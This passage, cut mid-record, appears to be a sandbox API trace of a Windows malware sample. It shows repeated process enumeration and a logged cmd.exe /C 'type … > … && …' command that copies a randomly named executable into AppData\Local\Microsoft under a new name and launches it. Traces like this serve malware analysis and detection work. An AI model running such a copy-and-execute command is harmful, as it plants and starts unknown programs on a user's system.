lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xad4, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.073] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 1 [0096.075] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 0 [0096.075] CloseHandle (hObject=0xc8) returned 1 [0096.075] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0096.076] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0096.076] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0096.076] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\", lpszShortPath=0x128b71c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\") returned 0x28 [0096.076] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0096.076] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0096.076] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" [PARAMS]", cchLength=0xb9 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\MICROS~1\\SYPYKBCK.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\MICROS~1\\SYPYKBCK.EXE\" [PARAMS]") returned 0xb9 [0096.076] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0096.076] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb30*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb20 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessInformation=0x12fb20*(hProcess=0xc4, hThread=0xc8, dwProcessId=0xb68, dwThreadId=0xb6c)) returned 1 [0096.246] CloseHandle (hObject=0xc4) returned 1 [0096.246] CloseHandle (hObject=0xc8) returned 1 [0096.246] Sleep (dwMilliseconds=0xfa) [0096.651] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xcc [0096.658] Process32FirstW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.659] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.659] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.660] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.661] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.662] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.662] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.663] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.663] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.664] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.665] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.665] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.666] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.667] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.667] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.668] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.669] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.669] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.670] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.671] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.672] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.673] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.674] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.675] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.677] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.678] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.679] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0096.680] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0096.681] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0096.682] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0096.684] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0096.685] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0096.686] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0096.687] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0096.688] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0096.689] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0096.690] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0096.691] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0096.693] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0096.694] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0096.695] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0096.696] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0096.697] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0096.723] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0096.724] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0096.725] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.726] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.727] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.728] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.729] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.730] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.731] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0096.732] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0096.733] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.734] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.735] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.736] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.737] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.739] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0096.741] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.742] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xad4, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.743] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 1 [0096.744] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.745] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.746] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.747] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.748] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0096.748] CloseHandle (hObject=0xcc) returned 1 [0096.748] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc8 [0096.758] Process32FirstW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 